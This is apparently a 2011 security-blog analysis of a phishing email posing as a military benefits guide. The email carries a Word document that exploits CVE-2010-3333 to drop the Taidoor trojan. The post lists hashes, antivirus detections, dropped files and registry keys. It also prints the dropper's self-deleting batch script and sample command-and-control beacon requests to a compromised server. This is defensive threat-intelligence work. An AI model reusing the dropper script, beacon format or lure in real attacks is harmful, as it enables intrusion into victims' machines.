Pages

Monday, June 13, 2011

Jun 1 CVE-2010-3333 DOC 2011 Insider's Guide to Military Benefits from compromised louisvilleheartsurgery.com w Trojan Taidoor

Common Vulnerabilities and Exposures (CVE)number

CVE-2010-3333 Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability

  General File Information

File 2011 Insider's Guide to Military Benefits .doc
File Size  92715 bytes
MD5 f520c8671ddb9965bbf541f20635ef30
Distribution Email Attachment

 The trojan within a word document was sent via mail.louisvilleheartsurgery.com (66.147.51.202), which appears to be a legitimate mail server of University of Louisville surgery program, which is outsourced to/hosted at Nuvox / Windstream Email hosting. The server must be misconfigured or compromised and is being actively used as a relay for phishing.(I have other examples of phish mail sent via that server and I will post them as soon as I can)

Download

Original Message


-----Original Message-----
From: Steve Ballinger [mailto:order@mail.milmall.com]
Sent: Wednesday, June 01, 2011 12:12 PM
To: xxxxxxxxxxxxxxx
Subject: 2011 Insider's Guide to Military Benefits

2011 Insider's Guide to Military Benefits - The Military Times Handbook for Military Life

By: New Military Times
Includes up to date essential information on:

Military Pay and Benefits
Community Resources For The Military
Education, Military Health Care
Housing
Leisure
Moving
Military Retirement
Separation


Message Headers

Received: (qmail 11282 invoked from network); 1 Jun 2011 16:12:10 -0000
Received: from mail.louisvilleheartsurgery.com (HELO ucsamd.com) (66.147.51.202)
  by xxxxxxxxxxxxxxxxxxxxxxx
Received: from UCSADC1 ([192.168.20.2]) by ucsamd.com with Microsoft SMTPSVC(6.0.3790.4675);
     Wed, 1 Jun 2011 12:12:09 -0400
Subject: 2011 Insider's Guide to Military Benefits
Date: Wed, 1 Jun 2011 12:12:08 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_0006_01CC204B.B2997820"
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4721
From: "Steve Ballinger"
To: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X-Mailer: Microsoft Outlook, Build 10.0.2627
Return-Path: order@mail.milmall.com
Message-ID:
X-OriginalArrivalTime: 01 Jun 2011 16:12:09.0066 (UTC) FILETIME=[A86A24A0:01CC2076]

Sender


IP numbers of host (1) 66.147.51.202
PTRs of IP numbers (1) mail.louisvilleheartsurgery.com
Host names sharing IP with A records (1) mail.louisvilleheartsurgery.com
A of PTR of A (1) 66.147.51.202
The sender email address was used order@mail.milmall.com, which is a spoof and is supposed to look like an address used by Mill-Mall - a military bookstore
  


Automated Scans

2011 Insider's Guide to Military Benefits .doc
http://www.virustotal.com/file-scan/report.html?id=60fd85657464c1388dd26cd336982f2e242959c828a696672ef9b1945dee62df-1307983543
Submission date: 2011-06-13 16:45:43 (UTC)
Result: 19/ 42 (45.2%)
AhnLab-V3 2011.06.13.00 2011.06.13 Dropper/Cve-2010-3333
AntiVir 7.11.9.167 2011.06.13 EXP/CVE-2010-3333
Avast 4.8.1351.0 2011.06.13 RTF:CVE-2010-3333
Avast5 5.0.677.0 2011.06.13 RTF:CVE-2010-3333
BitDefender 7.2 2011.06.13 Exploit.RTF.Gen
ClamAV 0.97.0.0 2011.06.13 BC.Exploit.CVE_2010_3333
Commtouch 5.3.2.6 2011.06.13 CVE-2010-3333!Camelot
DrWeb 5.0.2.03300 2011.06.13 Exploit.Rtf.based
F-Secure 9.0.16440.0 2011.06.13 Exploit.RTF.Gen
Fortinet 4.2.257.0 2011.06.11 Data/CVE20103333.A!exploit
GData 22 2011.06.13 Exploit.RTF.Gen
Ikarus T3.1.1.104.0 2011.06.13 Exploit.Win32.CVE-2010
Microsoft 1.6903 2011.06.13 Exploit:Win32/CVE-2010-3333
NOD32 6203 2011.06.13 Win32/Exploit.CVE-2010-3333
PCTools 7.0.3.5 2011.06.10 HeurEngine.MaliciousExploit
Symantec 20111.1.0.186 2011.06.13 Bloodhound.Exploit.366
TrendMicro 9.200.0.1012 2011.06.13 TROJ_ARTIEF.AE
TrendMicro-HouseCall 9.200.0.1012 2011.06.13 TROJ_ARTIEF.AE
VIPRE 9572 2011.06.13 Exploit.MSWord.CVE-2010-3333.c (v)
MD5   : f520c8671ddb9965bbf541f20635ef30

Created files

 This appears to be a fairly common trojan,  it is characterized by traffic it generates  and in some cases being detected as Trojan Tadoor - see example from the same sender here


http://99.1.23.71/qfgkt.php?id=030696111D308D0E8D
http://aaaaa/bbbbb.php?id=xxxxxxyyyyyyyyyyyy where
aaaaa is a host or domain
bbbbb is a 5 char string
xxxxxx is a 6 char changing string
yyyyyyyyyyyy - 12 char more or less constant string

 Created files

%Temp%\5.doc 0392F0E2B48D0F1364673F7305A04C57

%Temp%\~DF3055.bat DABFCF9C8BA049546158F259C8F52179
%Temp%\~Svchost.exe  d245958a8d1545e14a3a2dc3f212a5e4

created and deleted files
%userprofile%\desktop\~winhlp.tmp  D679CFCD2096E351DBBBB968B52B6C3C
 All Users\Application Data\iosys 


iosys - the trojan dropper
iosys gets dropped by the original word document in the same location.  It creates all other files mentioned in the Created Files section of this post.
Files added
----------------------------------
C:\WINDOWS\Prefetch\IOSYS.EXE-078F7196.pf  - iosys runs
C:\Documents and Settings\mila\Local Settings\Temp\5.doc  - creates clean decoy file
C:\Documents and Settings\mila\Local Settings\Temp\~DF3055.bat - creates batch file
C:\Documents and Settings\mila\Local Settings\Temp\~Svchost.exe  - creates ~Svchost.exe
C:\WINDOWS\Prefetch\WINWORD.EXE-37F6AE09.pf - launches 5.doc

Files deleted
----------------------------------
C:\Documents and Settings\mila\Desktop\iosys   ~DF3055.bat batch file deletes iosys and itself


iosys
Submission date: 2011-06-13 17:52:44 (UTC)
http://www.virustotal.com/file-scan/report.html?id=63a01a93eb991673239702dd404b7625c9cbad73a6aa112dd5461898248397ee-1307987564
Result: 15/ 42 (35.7%)
Compact Print results Antivirus Version Last Update Result
AntiVir 7.11.9.167 2011.06.13 TR/CryptRedol.17925.3.20
Avast 4.8.1351.0 2011.06.13 Win32:Trojan-gen
Avast5 5.0.677.0 2011.06.13 Win32:Trojan-gen
AVG 10.0.0.1190 2011.06.13 Generic22.BYNK.dropper
BitDefender 7.2 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
F-Secure 9.0.16440.0 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
GData 22 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
Kaspersky 9.0.0.837 2011.06.13 Trojan.Win32.Sasfis.bkyb
Microsoft 1.6903 2011.06.13 VirTool:Win32/Injector.gen!BJ
NOD32 6203 2011.06.13 a variant of Win32/Injector.GUH
Norman 6.07.10 2011.06.13 W32/Malware.THEX.dropper
nProtect 2011-06-13.02 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
Rising 23.62.00.03 2011.06.13 Suspicious
VBA32 3.12.16.1 2011.06.13 TrojanDownloader.Rubinurd.f
VIPRE 9572 2011.06.13 Trojan.Win32.Generic!BT
Additional informationShow all 
MD5   : 6b390f0e5db546090d43e37e928242ae

Some strings from iosys

 O&"4C
/9RjxidV7
2(R~M
&Xntdll.dll
NtUnmapViewOfSection
host.exe "
vices.exe "
%ProgramFiles%\Mcafee
abcde
W[SO
KSKS
{skc[SKC
wurpnk
hecXVS
 & 6"
5.doc
Dwf.qc`

Unicode Strings:
---------------------------------------------------------------------------
(null)
         (((((                  H
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
Adobe Systems, Inc.
FileDescription
Adobe? Flash? Player Installer/Uninstaller 10.1 r53
FileVersion
10,1,53,64
InternalName
Adobe? Flash? Player Installer/Uninstaller 10.1
LegalCopyright
Copyright ? 1996-2010 Adobe, Inc.
LegalTrademarks
Adobe? Flash? Player
OriginalFilename
FlashUtil.exe
ProductName
Flash? Player Installer/Uninstaller
ProductVersion
10,1,53,64
VarFileInfo
Translation
Root Entry
SummaryInformation
DocumentSummaryInformation
WordDocument
FCAA-VA Meeting
Cstro3
Normal.dotm
Lura Harrison
Microsoft Office Word
Fairfax County Government
KSOProductBuildVer
2052-6.6.0.2461
Footer Char
Balloon Text Char
0Table
Data
2011 Insider's Guide to Military Benefits - The Military Times Handbook for Military Life
By: Military Times
Includes up to date essential information on:
Military Pay and Benefits
Community Resources For The Military
Education, Military Health Care
Housing
Leisure
Moving
Military Retirement
Separation
http://www.mil-mall.com/2011-guide-to-militry-benefits.html?utm_source=marketplace
$5.00
Quantity   1 - 10     11 - 25     26 - 100     101 - 500     501+  
Price      $5.00      $4.50       $4.00        $3.00         $2.00 
Mil-Mall / 6883 Commercial Drive / Springfield, VA 22159 / Toll Free Inside U.S. 888-750-8099 / Outside U.S. 01-703-750-8099
PAGE 
PAGE 
List Paragraph
Times New Roman
Cambria Math
Symbol
Arial
Courier New
Wingdings
Tahoma
Normal.dotm
FCAA-VA Meeting
Cstro3
Lura Harrison
Z&!),.:;?]}


5.doc - decoy clean file
The document properties
FCAA-VA Meeting
Cstro3
Lura Harrison FCAA-VA Meeting, indicating that it was created by Fairfax County Government, however, the custom tab shows KSOProductBuildVer, which means it was created using Kingsoft Office

Kingsoft Office, commonly known simply as KSO, developed by Zhuhai based Chinese software developer Kingsoft, is an alternative to Microsoft Office. The product has had a long history of development in China, where it is still sold as WPS Office. "Kingsoft Office" is the company's attempt to crack, primarily, the Western and Japanese markets. Since Kingsoft Office 2005, the user interface bears resemblance to the Microsoft Office products, and the suite reads and writes the files generated by Office in addition to its native documents. The personal edition is free for download.


~DF3055.bat and winhp.tmp


contents of the file:
@echo off
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
 ....
@echo 123>>~winhp.tmp repeated exactly 1000 times
 .....
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@del ~winhp.tmp
del "c:\docume~1\alluse~1\applic~1\iosys"
"C:\DOCUME~1\mila\LOCALS~1\Temp\5.doc"
"C:\DOCUME~1\mila\LOCALS~1\Temp\~Svchost.exe"
del %0
@exit
 ~winhp.tmp contains nothing but 1000 row of 123. Reasons unclear, perhaps some sort of timer

 ~Svchost.exe
d245958a8d1545e14a3a2dc3f212a5e4
Submission date: 2011-06-12 15:01:53 (UTC)
http://www.virustotal.com/file-scan/report.html?id=0a9229f957257da1d231dfc75ba59e4d929deffed5293fca53d5b571086bbfe8-1307890913
Result: 29 /42 (69.0%)
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2011.06.12.02 2011.06.12 Trojan/Win32.Sasfis
AntiVir 7.11.9.159 2011.06.11 TR/CryptRedol.17925.3.20
Antiy-AVL 2.0.3.7 2011.06.12 Trojan/Win32.Sasfis.gen
Avast 4.8.1351.0 2011.06.12 Win32:Trojan-gen
Avast5 5.0.677.0 2011.06.12 Win32:Trojan-gen
AVG 10.0.0.1190 2011.06.12 Generic22.BYNK
BitDefender 7.2 2011.06.12 Trojan.CryptRedol.Gen.3
CAT-QuickHeal 11.00 2011.06.12 Trojan.Sasfis.bkyb
Comodo 9042 2011.06.12 UnclassifiedMalware
eSafe 7.0.17.0 2011.06.09 Win32.CryptRedol
F-Secure 9.0.16440.0 2011.06.12 Trojan.CryptRedol.Gen.3
Fortinet 4.2.257.0 2011.06.11 W32/Sasfis.BKYB!tr
GData 22 2011.06.12 Trojan.CryptRedol.Gen.3
Ikarus T3.1.1.104.0 2011.06.12 Trojan.SuspectCRC
Kaspersky 9.0.0.837 2011.06.12 Trojan.Win32.Sasfis.bkyb
McAfee 5.400.0.1158 2011.06.12 Artemis!D245958A8D15
McAfee-GW-Edition 2010.1D 2011.06.12 Artemis!D245958A8D15
Microsoft 1.6903 2011.06.12 VirTool:Win32/Injector.gen!BJ
NOD32 6200 2011.06.12 Win32/TrojanDownloader.Agent.PTT
Norman 6.07.10 2011.06.12 W32/Malware.THEX
nProtect 2011-06-12.01 2011.06.12 Trojan.CryptRedol.Gen.3
Panda 10.0.3.5 2011.06.12 Trj/CI.A
PCTools 7.0.3.5 2011.06.10 Trojan.Gen
Rising 23.61.04.07 2011.06.10 Suspicious
Symantec 20111.1.0.186 2011.06.12 Suspicious.Cloud.5
TheHacker 6.7.0.1.228 2011.06.11 Trojan/Sasfis.bkyb
VBA32 3.12.16.1 2011.06.10 TrojanDownloader.Rubinurd.f
VIPRE 9561 2011.06.12 Trojan.Win32.Generic!BT
VirusBuster 14.0.76.0 2011.06.11 Trojan.Sasfis!BVoRVaO8XBA
MD5   : d245958a8d1545e14a3a2dc3f212a5e4



Strings excerpt
/9RjxidV7
2(R~M
&Xntdll.dll
NtUnmapViewOfSection
host.exe "
vices.exe "
%ProgramFiles%\Mcafee
abcde

Unicode Strings:
---------------------------------------------------------------------------
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
Adobe Systems, Inc.
FileDescription
Adobe? Flash? Player Installer/Uninstaller 10.1 r53 --- these ?? are broken unicode, I suppose
FileVersion
10,1,53,64
InternalName
Adobe? Flash? Player Installer/Uninstaller 10.1
LegalCopyright
Copyright ? 1996-2010 Adobe, Inc.
LegalTrademarks
Adobe? Flash? Player
OriginalFilename
FlashUtil.exe
ProductName
Flash? Player Installer/Uninstaller
ProductVersion
10,1,53,64
VarFileInfo
Translation
Language code of the file is displayed as English - United States en-us 1033 but the language ID is actually Chinese Simplified     (The language ID is a word integer value made up of a primary language and its sublanguage which is defined by Windows. If the resource item is “language neutral” then this value is zero.)



Threatexpert analysis
 http://www.threatexpert.com/report.aspx?md5=d245958a8d1545e14a3a2dc3f212a5e4
Registry Modifications
  • The following Registry Keys were created:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG
  • The newly created Registry Value is:
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG]
      • Trace Level = "" 
Other details
  • Analysis of the file resources indicate the following possible country of origin:
China    
  • There was registered attempt to establish connection with the remote host. The connection details are:
Remote Host Port Number
99.1.23.71 443
  • The data identified by the following URLs was then requested from the remote web server:
    • http://99.1.23.71/qfgkt.php?id=030696111D308D0E8D
    • http://99.1.23.71/qfgkt.php?id=013649111D308D0E8D
    • http://99.1.23.71/qfgkt.php?id=000041111D308D0E8D

Outbound traffic (potentially malicious)
  • There was an outbound traffic produced on port 443:




Traffic

CnC server
Download pcap file here
SSL to / from 99.1.23.71:443 
examples 
GET /wmssk.php?id=016180191138FEBC54 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 99.1.23.71
Connection: Keep-Alive
Cache-Control: no-cache 
GET /ldtxh.php?id=011340111D30541B71 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 99.1.23.71
Connection: Keep-Alive
   
99.1.23.71 an IIS compromised server, which belongs to  Sun Country Medical Equipment

99.1.23.64 - 99.1.23.71
SUN COUNTRY MEDICAL EQUIPMENT-080827115120
Private Address
Plano, TX 75075 United States 
IPAdmin ATT Internet Services
+1-800-648-1626
ipadmin@att.com
IPAdmin ATT Internet Services
+1-800-648-1626
ipadmin@att.com

SBC-99-1-23-64-29-0808275145
Created: 2008-08-27
Updated: 2011-03-19
Source: whois.arin.net



No comments:

Post a Comment